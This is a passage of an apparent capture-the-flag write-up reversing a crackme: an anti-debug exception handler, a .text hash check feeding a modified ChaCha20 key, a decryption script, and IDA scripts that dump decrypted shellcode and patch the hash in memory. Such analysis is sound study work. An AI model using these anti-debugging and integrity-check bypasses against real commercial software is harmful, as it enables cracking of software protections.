At sub_4046C8, once 0x80000003 and several times 0x80000004 were triggered. Next, the program runs to a custom section .pc at 0x40A000. This area is filled with illegal instructions and soon caused exception 0x80000001:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
int __thiscall Handler_0x80000001(int this, int a2, int a3)
{
if ( **(_BYTE **)(this + 36) )
{
sub_4037C9();
if ( *(_DWORD *)(a2 + 16) )
{
n8 = *(_DWORD *)(a2 + 20);
if ( n8 < 2 )
{
sub_4037CD(**(_DWORD **)(this + 28), *(_DWORD *)(*(_DWORD *)(this + 28) + 8));
}
else if ( n8 == 8 )
{
v5 = a3;
v6 = *(char **)(a3 + 184);
if ( sub_4044FA((_DWORD *)this, (unsigned int)v6) )
{
*(_DWORD *)(this + 60) = v6;
sub_40413B((void *)this, v5, v6);
}
else
{
sub_4037FA(&a3);
}
}
}
}
return -1;
}

The a2 is the kind of exception, and a3 + 184 is CONTEXT.Eip. In sub_4037FA, the a1 points to DR (Debug Registers), and this function set DR0, DR6 and DR7 to 0, which equivalents to clearing all hardware breakpoints:

1
2
3
4
5
6
7
8
9
int __stdcall sub_4037FA(int *a1)
{
*(_DWORD *)(*a1 + 24) = 0;
*(_DWORD *)(*a1 + 20) = 0;
*(_DWORD *)(*a1 + 4) = 0;
result = *a1;
*(_DWORD *)(*a1 + 192) |= 0x100u;
return result;
}

Patch to:

1
2
3
4
5
6
int __stdcall sub_4037FA(int *a1)
{
result = *a1;
*(_DWORD *)(*a1 + 192) |= 0x100u;
return result;
}

At sub_40413B, there’s an algorithm:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
int __thiscall sub_40413B(void *this, int a2, char *Src)
{
v3 = sub_403FBA((int)this, Src);
sub_404684((int)&a2, (int)v3);
return sub_4037FA(&a2);
}

char *__thiscall sub_403FBA(int this, char *Src)
{
sub_404286((int **)this);
sub_40464A((_DWORD *)this);
Src_1 = Src;
v4 = sub_404059((size_t *)this, Src);
if ( sub_40477E((char *)v4) )
{
Src_2 = (char *)sub_40479C((_DWORD *)this, *(_DWORD *)(this + 4), 12288, 64);
*(_DWORD *)(this + 56) = Src_2;
Src = Src_2;
sub_403A69((int *)(this + 48), v7, &Src);
memcpy(*(void **)(this + 56), v4, *(_DWORD *)this);
Src_1 = *(char **)(this + 56);
}
else
{
memcpy(Src_1, v4, *(_DWORD *)this);
Src = &Src_1[-**(_DWORD **)(this + 28)];
sub_4039D4((int *)(this + 40), v7, &Src);
}
j_j_free_0(v4);
return Src_1;
}

void *__thiscall sub_404059(size_t *this, char *Src)
{
v3 = sub_408AE8(*this);
memcpy(v3, Src, *this);
v4 = &Src[-*(_DWORD *)this[7]];
v10[0] = 0xD0C0B0A;
v10[1] = 0x11100F0E;
v5 = (char *)sub_403477();
v6 = sub_40330A(v5);
sub_401E39(src_, (int)v6, (int)v10, 0, 0);
sub_4022B8((int)src_, (unsigned int)v4);
sub_401F4D(src_, v7, (int)v3, 0x10u);
return v3;
}

_DWORD *__thiscall sub_401E39(_DWORD *this, int a2, int a3, int a4, int a5)
{
sub_401E67(this, a2, a3);
this[12] = a4;
this[13] = a5;
this_1 = this;
this[32] = 64;
return this_1;
}

_DWORD *__thiscall sub_401E67(_DWORD *this, int a2, int a3)
{
key[0] = 0xB979379E;
key[1] = 0x157C4A7F;
key[2] = 0x60C09CF3;
key[3] = 0x34C8ED5C;
*this = sub_402292(key);
this[1] = sub_402292(&key[1]);
this[2] = sub_402292(&key[2]);
this[3] = sub_402292(&key[3]);
this[4] = sub_402292(a2);
this[5] = sub_402292(a2 + 4);
this[6] = sub_402292(a2 + 8);
this[7] = sub_402292(a2 + 12);
this[8] = sub_402292(a2 + 16);
this[9] = sub_402292(a2 + 20);
this[10] = sub_402292(a2 + 24);
this[11] = sub_402292(a2 + 28);
this[12] = 0;
this[13] = 0;
this[14] = sub_402292(a3);
this[15] = sub_402292(a3 + 4);
return this;
}

The array a2 is 8 dwords at 0x40D268, generated from the program’s .text section’s sha256 hash. This means we can’t set software breakpoints and patch the program before the checksum finished. The right checksum is F6 30 AA 38 D5 72 97 37 5D 64 55 59 C3 34 FD 50 D5 5C A1 D1 77 D2 65 5A 04 23 51 CF 69 24 4B F2. After patching the checksum:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
_DWORD *__thiscall sub_401E67(_DWORD *this, int a2, int a3)
{
v5[0] = 0xB979379E;
v5[1] = 0x157C4A7F;
v5[2] = 0x60C09CF3;
v5[3] = 0x34C8ED5C;
*this = sub_402292(v5);
this[1] = sub_402292(&v5[1]);
this[2] = sub_402292(&v5[2]);
this[3] = sub_402292(&v5[3]);
this[4] = 0x38AA30F6;
this[5] = 0x379772D5;
this[6] = 0x5955645D;
this[7] = 0x50FD34C3;
this[8] = 0xD1A15CD5;
this[9] = 0x5A65D277;
this[10] = 0xCF512304;
this[11] = 0xF24B2469;
this[12] = 0;
this[13] = 0;
this[14] = sub_402292(a3);
this[15] = sub_402292(a3 + 4);
return this;
}

the program successfully returns the “try again” window. The self-decrypt algorithm is a modified chacha20. Decrypt the .pc section:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
import struct
from pathlib import Path

def rotl32(x, n): return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def quarter_round(x, a, b, c, d):
x[a] = (x[a] + x[b]) & 0xFFFFFFFF
x[d] ^= x[a]; x[d] = rotl32(x[d], 16)
x[c] = (x[c] + x[d]) & 0xFFFFFFFF
x[b] ^= x[c]; x[b] = rotl32(x[b], 12)
x[a] = (x[a] + x[b]) & 0xFFFFFFFF
x[d] ^= x[a]; x[d] = rotl32(x[d], 8)
x[c] = (x[c] + x[d]) & 0xFFFFFFFF
x[b] ^= x[c]; x[b] = rotl32(x[b], 7)

def chacha20_block(state16_words):
x = state16_words[:]
for _ in range(10):
quarter_round(x, 0, 4, 8, 12)
quarter_round(x, 1, 5, 9, 13)
quarter_round(x, 2, 6, 10, 14)
quarter_round(x, 3, 7, 11, 15)
quarter_round(x, 0, 5, 10, 15)
quarter_round(x, 1, 6, 11, 12)
quarter_round(x, 2, 7, 8, 13)
quarter_round(x, 3, 4, 9, 14)
out = [(x[i] + state16_words[i]) & 0xFFFFFFFF for i in range(16)]
return b"".join(struct.pack("<I", w) for w in out)

def chacha20_xor(data_bytes, consts4, key8, nonce2, counter0=0, counter1=0):
out = bytearray()
c0, c1 = counter0 & 0xFFFFFFFF, counter1 & 0xFFFFFFFF
for bi in range((len(data_bytes) + 63) // 64):
state = consts4 + key8 + [c0, c1] + nonce2
ks = chacha20_block(state)
chunk = data_bytes[bi * 64:(bi + 1) * 64]
out.extend(bytes(chunk[i] ^ ks[i] for i in range(len(chunk))))
c0 = (c0 + 1) & 0xFFFFFFFF
if c0 == 0: c1 = (c1 + 1) & 0xFFFFFFFF
return bytes(out)

def extract_section(pe_path: Path, sec_name: str) -> bytes:
pe = pe_path.read_bytes()
if pe[:2] != b"MZ": raise ValueError("Not an MZ executable")
e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
if pe[e_lfanew:e_lfanew+4] != b"PE\0\0": raise ValueError("Not a PE file")
coff = e_lfanew + 4
num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
sec_off = coff + 20 + opt_size
for i in range(num_sections):
off = sec_off + i * 40
name = pe[off:off+8].split(b"\0", 1)[0].decode("ascii", "ignore")
vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, off + 8)
if name == sec_name: return pe[raw_ptr:raw_ptr + raw_size]
raise KeyError(f"Section {sec_name!r} not found")

def main():
consts = [0xB979379E, 0x157C4A7F, 0x60C09CF3, 0x34C8ED5C]
key = [0x38AA30F6, 0x379772D5, 0x5955645D, 0x50FD34C3, 0xD1A15CD5, 0x5A65D277, 0xCF512304, 0xF24B2469]
counter = (0, 0)
nonce = [0x0D0C0B0A, 0x11100F0E]
exe = Path("Crackme.exe")
pc = extract_section(exe, ".pc")
dec = chacha20_xor(pc, consts, key, nonce, counter0=counter[0], counter1=counter[1])
Path("pc_decrypted.bin").write_bytes(dec)
print(f"[+] .pc size = {len(pc)} bytes")

if __name__ == "__main__":
main()

However, the decrypted shellcode is full of junk codes and control flow flattening obfuscating, making it difficult to analyze.

To find the function after decrypt, after called loc_40A000, in sub_40413B:

1
2
3
4
5
6
int __thiscall sub_40413B(void *this, int a2, char *Src)
{
v3 = sub_403FBA((int)this, Src);
sub_404684((int)&a2, (int)v3);
return sub_4037FA(&a2);
}

The v3 is the place of decrypted function. First function:

1
2
3
4
5
6
7
8
_DWORD *__fastcall sub_40A000(_DWORD *key)
{
key[0] = 0x865DBB47;
key[1] = 0x0A6EB190;
key[2] = 0x20476C33;
key[3] = 0x1C8A7693;
key[4] = 0x59FEBDFB;
}

returns 5 dwords (key). Debugging found that the program decrypts 16 bytes of encrypted bytecode each time, and then only executes one line of assembly code. The next decryption starts from the end of the previous assembly code. When set breakpoint at 0x404010 (before memcpy of decrypted code), the code will store at *EBX. Dump the assembly code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
import os
import struct
import idc
import ida_dbg
import ida_kernwin
import idaapi

BREAK_EA = 0x00404010
OUTPUT_PATH = r"E:\CTF\temp\dump.bin"
READ_SIZE = 0x10
PAD_SIZE = 0x10
g_hooks = None
g_fp = None

def _execute_sync(fn):
try: ida_kernwin.execute_sync(fn, ida_kernwin.MFF_FAST)
except Exception:
try: fn()
except Exception: pass

def _read_mem(ea, size, tid=None):
try:
bs = idaapi.dbg_read_memory(ea, size)
if bs: return bytes(bs)
except Exception: pass
try:
bs = ida_dbg.read_dbg_memory(ea, size)
if bs: return bytes(bs)
except Exception: pass
if tid is not None:
try:
bs = ida_dbg.read_dbg_memory(tid, ea, size)
if bs: return bytes(bs)
except Exception: pass
try:
buf = bytearray(size)
ok = ida_dbg.read_dbg_memory(ea, buf, size)
if ok: return bytes(buf)
except Exception: pass
print(f"[dump] failed to read dbg memory @ 0x{ea:08X}, size=0x{size:X}")
return None

def _dump_once(tid=None):
global g_fp
try: p = ida_dbg.get_reg_val("EBX")
except Exception as e:
print(f"[dump] get_reg_val(EBX) failed: {e}")
return
if p is None or p < 0x10000:
print(f"[dump] EBX=0x{0 if p is None else p:08X} looks invalid, skip")
return
data = _read_mem(p, READ_SIZE, tid=tid)
if data is None:
print(f"[dump] failed to read {READ_SIZE} bytes @ EBX=0x{p:08X}")
return
if len(data) < READ_SIZE: data += b"\x00" * (READ_SIZE - len(data))
out = data + (b"\x00" * PAD_SIZE)
try:
g_fp.write(out)
g_fp.flush()
print(f"[dump] hit 0x{BREAK_EA:08X} | EBX=0x{p:08X} | wrote {len(out)} bytes")
except Exception as e: print(f"[dump] file write error: {e}")

def _continue():
try:
ida_dbg.continue_process()
return
except Exception: pass
try:
ida_dbg.request_continue_process()
return
except Exception as e: print(f"[dump] continue failed: {e}")

class DumpHooks(ida_dbg.DBG_Hooks):
def dbg_bpt(self, tid, ea):
try:
if ea != BREAK_EA: return 0
_dump_once(tid=tid)
def _cont(): _continue()
_execute_sync(_cont)
return 0
except Exception as e:
print(f"[dump] dbg_bpt exception: {e}")
return 0

def dbg_process_exit(self, pid, tid, ea, exit_code):
print(f"[dump] process exit (code={exit_code}), stopping.")
try: stop()
except Exception: pass
return 0

def start():
global g_hooks, g_fp
if g_hooks is not None:
print("[dump] already started")
return
os.makedirs(os.path.dirname(OUTPUT_PATH), exist_ok=True)
g_fp = open(OUTPUT_PATH, "ab")
try:
idc.add_bpt(BREAK_EA)
idc.enable_bpt(BREAK_EA, True)
except Exception:
try: ida_dbg.add_bpt(BREAK_EA)
except Exception as e:
print(f"[dump] add_bpt failed: {e}")
raise
g_hooks = DumpHooks()
g_hooks.hook()
print("[dump] started.")
print(f" BREAK_EA = 0x{BREAK_EA:08X}")
print(f" OUTPUT = {OUTPUT_PATH}")

def stop():
global g_hooks, g_fp
if g_hooks is not None:
try: g_hooks.unhook()
except Exception: pass
g_hooks = None
try: idc.enable_bpt(BREAK_EA, False)
except Exception: pass
if g_fp is not None:
try:
g_fp.flush()
g_fp.close()
except Exception: pass
g_fp = None
print("[dump] stopped.")

if __name__ == "__main__":
start()

Disasm the shellcode:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
# -*- coding: utf-8 -*-
import os
import idc
import idaapi
import ida_bytes
import ida_funcs
import ida_lines
import idautils

OUTPUT_PATH = r"E:\CTF\temp\trace.txt"
STEP = 0x40
TARGET_SEG_NAME = None

def pick_target_seg():
if TARGET_SEG_NAME:
seg = idaapi.get_segm_by_name(TARGET_SEG_NAME)
if seg: return seg
print(f"[trace] segment '{TARGET_SEG_NAME}' not found, fallback to auto-pick")
seg0 = idaapi.getseg(0)
if seg0: return seg0
best = None
for s in idautils.Segments():
seg = idaapi.getseg(s)
if not seg: continue
if best is None or seg.start_ea < best.start_ea: best = seg
return best

def undefine_all(seg_start, seg_end):
funcs = list(idautils.Functions(seg_start, seg_end))
for f in funcs:
try: ida_funcs.del_func(f)
except Exception: pass
size = seg_end - seg_start
try: ida_bytes.del_items(seg_start, ida_bytes.DELIT_EXPAND | ida_bytes.DELIT_SIMPLE, size)
except Exception: ida_bytes.del_items(seg_start, ida_bytes.DELIT_SIMPLE, size)

def make_code_and_get_line(ea):
try: idc.create_insn(ea)
except Exception: pass
line = idc.generate_disasm_line(ea, 0)
if not line:
try: idaapi.auto_wait()
except Exception: pass
line = idc.generate_disasm_line(ea, 0)
if not line: return None
try: line = ida_lines.tag_remove(line)
except Exception: pass
return line.strip()

def main():
seg = pick_target_seg()
if not seg:
print("[trace] no segment found")
return
seg_start = seg.start_ea
seg_end = seg.end_ea
print("[trace] target segment:")
print(f" name = {idaapi.get_segm_name(seg)}")
print(f" range = 0x{seg_start:08X} - 0x{seg_end:08X} (size=0x{seg_end-seg_start:X})")
print(f" step = 0x{STEP:X}")
print(f" out = {OUTPUT_PATH}")
undefine_all(seg_start, seg_end)
os.makedirs(os.path.dirname(OUTPUT_PATH), exist_ok=True)
addrs = list(range(seg_start, seg_end, STEP))
print(f"[trace] creating code & dumping first lines: {len(addrs)} entries ...")
with open(OUTPUT_PATH, "w", encoding="utf-8", newline="\n") as fp:
for ea in addrs:
line = make_code_and_get_line(ea)
if line is None: fp.write(f"{ea:08X}: <disasm failed>\n")
else: fp.write(f"{ea:08X}: {line}\n")
print("[trace] done.")

if __name__ == "__main__":
main()

From the trace, it was found that the shellcode has the behavior of accessing sha256 hash, as previous program hash. Set bp at advapi32_CryptCreateHash, advapi32_CryptHashData and advapi32_CryptGetHashParam, ant it was found that these functions were called at least dozens of times, and each time they were generating a hash of the .text section. Hook hash:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
import ida_dbg
import idaapi
import idc
import struct
import os

TEXT_BASE = 0x401000
TEXT_LEN = 0x8A00
PATCH_DST = 0x40D268
CRYPTSP_GHP_RET_EA_ABS = 0x720D50D2
CRYPT_HASHDATA_NAME_CANDIDATES = ["cryptsp_CryptHashData", "cryptsp.dll_CryptHashData", "CryptHashData"]
PATCH_BYTES = bytes.fromhex("F6 30 AA 38 D5 72 97 37 5D 64 55 59 C3 34 FD 50 D5 5C A1 D1 77 D2 65 5A 04 23 51 CF 69 24 4B F2")
g_hooks = None
g_hash_seen_text = set()

def _u32(x): return x & 0xFFFFFFFF

def dbg_read_mem(ea, n):
try:
bs = idaapi.dbg_read_memory(ea, n)
return bytes(bs) if bs else None
except Exception: return None

def dbg_write_mem(ea, data: bytes):
try:
ok = idaapi.dbg_write_memory(ea, data)
return bool(ok)
except Exception: pass
try:
ok = ida_dbg.write_dbg_memory(ea, data)
return bool(ok)
except Exception: pass
try:
buf = bytearray(data)
ok = ida_dbg.write_dbg_memory(ea, buf, len(buf))
return bool(ok)
except Exception: return False

def dbg_read_u32(ea):
bs = dbg_read_mem(ea, 4)
if not bs or len(bs) != 4: return None
return struct.unpack("<I", bs)[0]

def dbg_write_u32(ea, v): return dbg_write_mem(ea, struct.pack("<I", _u32(v)))

def is_in_text(pb, cb):
if pb is None or cb is None: return False
start = pb
end = pb + cb
return (start >= TEXT_BASE) and (end <= (TEXT_BASE + TEXT_LEN))

def find_module_base(substr: str):
substr = substr.lower()
try:
m = ida_dbg.get_first_module()
while m:
name = (getattr(m, "name", "") or "").lower()
if substr in name: return int(getattr(m, "base", 0))
m = ida_dbg.get_next_module(m)
except Exception: pass
return None

def resolve_ea_by_names(names):
for nm in names:
ea = idc.get_name_ea_simple(nm)
if ea != idc.BADADDR and ea != 0: return ea
return None

def add_bpt(ea):
try:
idc.add_bpt(ea)
idc.enable_bpt(ea, True)
return True
except Exception: pass
try:
ida_dbg.add_bpt(ea)
return True
except Exception: return False

class Hooks(ida_dbg.DBG_Hooks):
def dbg_bpt(self, tid, ea):
esp = ida_dbg.get_reg_val("ESP")
if ea == self.crypt_hashdata_ea:
hHash = dbg_read_u32(esp + 4)
pbData = dbg_read_u32(esp + 8)
cbData = dbg_read_u32(esp + 0xC)
if is_in_text(pbData, cbData):
g_hash_seen_text.add(hHash)
print(f"[hash] tid={tid} hHash=0x{hHash:08X} HASHED_TEXT pb=0x{pbData:08X} len=0x{cbData:X}")
ida_dbg.continue_process()
return 0
if ea == self.crypt_gethashparam_ret_ea:
hHash = dbg_read_u32(esp + 4)
dwParam = dbg_read_u32(esp + 8)
pbOut = dbg_read_u32(esp + 0xC)
pdwLen = dbg_read_u32(esp + 0x10)
do_patch = (dwParam == 2 and hHash in g_hash_seen_text and pbOut == PATCH_DST)
if do_patch:
ok1 = dbg_write_mem(PATCH_DST, PATCH_BYTES)
ok2 = True
if pdwLen: ok2 = dbg_write_u32(pdwLen, 0x20)
print(f"[patch] tid={tid} hHash=0x{hHash:08X} patched @0x{PATCH_DST:08X} bytes_ok={ok1} len_ok={ok2} (dwParam=HP_HASHVAL)")
ida_dbg.continue_process()
return 0
return 0

def start():
global g_hooks
if g_hooks is not None:
print("[patchhash] already started")
return
cryptsp_base = find_module_base("cryptsp")
if cryptsp_base: crypt_gethashparam_ret = cryptsp_base + 0x50D2
else: crypt_gethashparam_ret = CRYPTSP_GHP_RET_EA_ABS
crypt_hashdata_ea = resolve_ea_by_names(CRYPT_HASHDATA_NAME_CANDIDATES)
if crypt_hashdata_ea is None:
print("[patchhash] WARNING: cannot resolve cryptsp_CryptHashData by name.")
print("[patchhash] Please rename it or set its EA manually in the script.")
return
if not add_bpt(crypt_hashdata_ea):
print(f"[patchhash] failed to add bpt @ 0x{crypt_hashdata_ea:08X} (CryptHashData)")
return
if not add_bpt(crypt_gethashparam_ret):
print(f"[patchhash] failed to add bpt @ 0x{crypt_gethashparam_ret:08X} (GetHashParam RET)")
return
g_hooks = Hooks()
g_hooks.crypt_hashdata_ea = crypt_hashdata_ea
g_hooks.crypt_gethashparam_ret_ea = crypt_gethashparam_ret
g_hooks.hook()
print("[patchhash] started.")
print(f" CryptHashData EA = 0x{crypt_hashdata_ea:08X}")
print(f" GetHashParam RET EA = 0x{crypt_gethashparam_ret:08X}")
print(f" TEXT region = 0x{TEXT_BASE:08X} .. 0x{(TEXT_BASE+TEXT_LEN):08X}")
print(f" PATCH dst = 0x{PATCH_DST:08X}")
print(f" PATCH bytes len = {len(PATCH_BYTES)}")
def stop():
global g_hooks
if g_hooks:
try: g_hooks.unhook()
except Exception: pass
g_hooks = None
print("[patchhash] stopped.")

start()

Mix:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
import os
import struct
import idc
import ida_dbg
import ida_kernwin
import idaapi

BREAK_EA = 0x00404010
OUTPUT_PATH = r"E:\CTF\temp\dump.bin"
READ_SIZE = 0x10
PAD_SIZE = 0x10
APPEND_OUTPUT = False
DEDUP_CONSECUTIVE = True
MAX_DUMPS = 0
TEXT_BASE = 0x00401000
TEXT_LEN = 0x8A00
PATCH_DST = 0x0040D268
CRYPTSP_GHP_RET_EA_ABS = 0x720D50D2
CRYPT_HASHDATA_NAME_CANDIDATES = ["cryptsp_CryptHashData", "cryptsp.dll_CryptHashData", "CryptHashData"]
HP_HASHVAL = 2
PATCH_BYTES = bytes.fromhex("F6 30 AA 38 D5 72 97 37 5D 64 55 59 C3 34 FD 50 D5 5C A1 D1 77 D2 65 5A 04 23 51 CF 69 24 4B F2")
g_hooks = None
g_fp = None
g_hash_seen_text = set()
g_last_dump16 = None
g_dump_count = 0

def _execute_sync(fn):
try: ida_kernwin.execute_sync(fn, ida_kernwin.MFF_FAST)
except Exception:
try: fn()
except Exception: pass

def _continue():
try:
ida_dbg.continue_process()
return
except Exception as e: print(f"[mix] continue failed: {e}")

def dbg_read_mem(ea, size):
try:
bs = idaapi.dbg_read_memory(ea, size)
return bytes(bs) if bs else None
except Exception: return None

def dbg_write_mem(ea, data: bytes):
try:
ok = idaapi.dbg_write_memory(ea, data)
return bool(ok)
except Exception: return False

def dbg_read_u32(ea):
bs = dbg_read_mem(ea, 4)
if not bs or len(bs) != 4: return None
return struct.unpack("<I", bs)[0]

def dbg_write_u32(ea, v): return dbg_write_mem(ea, struct.pack("<I", v & 0xFFFFFFFF))

def is_in_text(pb, cb):
if pb is None or cb is None: return False
return (pb >= TEXT_BASE) and ((pb + cb) <= (TEXT_BASE + TEXT_LEN))

def find_module_base(substr: str):
substr = substr.lower()
try:
m = ida_dbg.get_first_module()
while m:
name = (getattr(m, "name", "") or "").lower()
if substr in name: return int(getattr(m, "base", 0))
m = ida_dbg.get_next_module(m)
except Exception: pass
return None

def resolve_ea_by_names(names):
for nm in names:
ea = idc.get_name_ea_simple(nm)
if ea != idc.BADADDR and ea != 0: return ea
return None

def add_bpt(ea):
try:
idc.add_bpt(ea)
idc.enable_bpt(ea, True)
return True
except Exception: pass
try:
ida_dbg.add_bpt(ea)
return True
except Exception: return False

def _dump_once(tid=None):
global g_fp, g_last_dump16, g_dump_count
if MAX_DUMPS and g_dump_count >= MAX_DUMPS: return
try: p = ida_dbg.get_reg_val("EBX")
except Exception as e:
print(f"[dump] get_reg_val(EBX) failed: {e}")
return
if p is None or p < 0x10000: return
data = dbg_read_mem(p, READ_SIZE)
if data is None:
print(f"[dump] failed to read {READ_SIZE} bytes @ EBX=0x{p:08X}")
return
if len(data) < READ_SIZE: data += b"\x00" * (READ_SIZE - len(data))
if DEDUP_CONSECUTIVE and g_last_dump16 == data: return
out = data + (b"\x00" * PAD_SIZE)
try:
g_fp.write(out)
g_fp.flush()
g_last_dump16 = data
g_dump_count += 1
print(f"[dump] #{g_dump_count} hit 0x{BREAK_EA:08X} | EBX=0x{p:08X} | wrote {len(out)} bytes")
except Exception as e:
print(f"[dump] file write error: {e}")

def _maybe_patch_hash():
esp = ida_dbg.get_reg_val("ESP")
hHash = dbg_read_u32(esp + 4)
dwParam = dbg_read_u32(esp + 8)
pbOut = dbg_read_u32(esp + 0xC)
pdwLen = dbg_read_u32(esp + 0x10)
if dwParam != HP_HASHVAL: return
if (hHash in g_hash_seen_text) and (pbOut == PATCH_DST):
ok1 = dbg_write_mem(PATCH_DST, PATCH_BYTES)
ok2 = True
if pdwLen: ok2 = dbg_write_u32(pdwLen, 0x20)
print(f"[patch] hHash=0x{hHash:08X} patched @0x{PATCH_DST:08X} bytes_ok={ok1} len_ok={ok2}")

class MixHooks(ida_dbg.DBG_Hooks):
def __init__(self, crypt_hashdata_ea, crypt_gethashparam_ret_ea):
super().__init__()
self.crypt_hashdata_ea = crypt_hashdata_ea
self.crypt_gethashparam_ret_ea = crypt_gethashparam_ret_ea

def dbg_bpt(self, tid, ea):
try:
if ea == self.crypt_hashdata_ea:
esp = ida_dbg.get_reg_val("ESP")
hHash = dbg_read_u32(esp + 4)
pbData = dbg_read_u32(esp + 8)
cbData = dbg_read_u32(esp + 0xC)

if is_in_text(pbData, cbData):
g_hash_seen_text.add(hHash)
print(f"[hash] tid={tid} hHash=0x{hHash:08X} HASHED_TEXT pb=0x{pbData:08X} len=0x{cbData:X}")
_execute_sync(_continue)
return 0
if ea == self.crypt_gethashparam_ret_ea:
_maybe_patch_hash()
_execute_sync(_continue)
return 0
if ea == BREAK_EA:
_dump_once(tid=tid)
if MAX_DUMPS and g_dump_count >= MAX_DUMPS:
print(f"[dump] reached MAX_DUMPS={MAX_DUMPS}, stopping hooks.")
stop()
return 0
_execute_sync(_continue)
return 0
return 0
except Exception as e:
print(f"[mix] dbg_bpt exception: {e}")
try: _execute_sync(_continue)
except Exception: pass
return 0

def dbg_process_exit(self, pid, tid, ea, exit_code):
print(f"[mix] process exit (code={exit_code}), stopping.")
try: stop()
except Exception: pass
return 0

def start():
global g_hooks, g_fp, g_hash_seen_text, g_last_dump16, g_dump_count
if g_hooks is not None:
print("[mix] already started")
return
g_hash_seen_text = set()
g_last_dump16 = None
g_dump_count = 0
os.makedirs(os.path.dirname(OUTPUT_PATH), exist_ok=True)
g_fp = open(OUTPUT_PATH, "ab" if APPEND_OUTPUT else "wb")
crypt_hashdata_ea = resolve_ea_by_names(CRYPT_HASHDATA_NAME_CANDIDATES)
if crypt_hashdata_ea is None:
print("[mix] ERROR: cannot resolve cryptsp_CryptHashData by name.")
print("[mix] Please rename that function in IDA or hardcode its EA in the script.")
return

cryptsp_base = find_module_base("cryptsp")
if cryptsp_base: crypt_gethashparam_ret_ea = cryptsp_base + 0x50D2
else: crypt_gethashparam_ret_ea = CRYPTSP_GHP_RET_EA_ABS
if not add_bpt(BREAK_EA):
print(f"[mix] ERROR: add_bpt failed @ 0x{BREAK_EA:08X}")
return
if not add_bpt(crypt_hashdata_ea):
print(f"[mix] ERROR: add_bpt failed @ 0x{crypt_hashdata_ea:08X} (CryptHashData)")
return
if not add_bpt(crypt_gethashparam_ret_ea):
print(f"[mix] ERROR: add_bpt failed @ 0x{crypt_gethashparam_ret_ea:08X} (GetHashParam RET)")
return
g_hooks = MixHooks(crypt_hashdata_ea, crypt_gethashparam_ret_ea)
g_hooks.hook()
print("[mix] started.")
print(f" BREAK_EA = 0x{BREAK_EA:08X}")
print(f" CryptHashData EA = 0x{crypt_hashdata_ea:08X}")
print(f" GetHashParam RET EA = 0x{crypt_gethashparam_ret_ea:08X}")
print(f" TEXT = 0x{TEXT_BASE:08X}..0x{(TEXT_BASE+TEXT_LEN):08X}")
print(f" PATCH_DST = 0x{PATCH_DST:08X}")
print(f" OUTPUT = {OUTPUT_PATH}")
print(f" DEDUP_CONSECUTIVE = {DEDUP_CONSECUTIVE}")
print(f" MAX_DUMPS = {MAX_DUMPS or 'unlimited'}")

def stop():
global g_hooks, g_fp
if g_hooks is not None:
try: g_hooks.unhook()
except Exception: pass
g_hooks = None
try: idc.enable_bpt(BREAK_EA, False)
except Exception: pass
if g_fp is not None:
try:
g_fp.flush()
g_fp.close()
except Exception: pass
g_fp = None
print("[mix] stopped.")

if __name__ == "__main__":
start()

Set hardware breakpoint at 0x19F38C, and the shellcode firstly calls strlen and cmp the length with 19. However, setting hardware breakpoints can also cause subsequent instructions to malfunction after triggering the breakpoint. Parse dump.bin (not that if the operator is call, it will not appears at the first line of a block):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
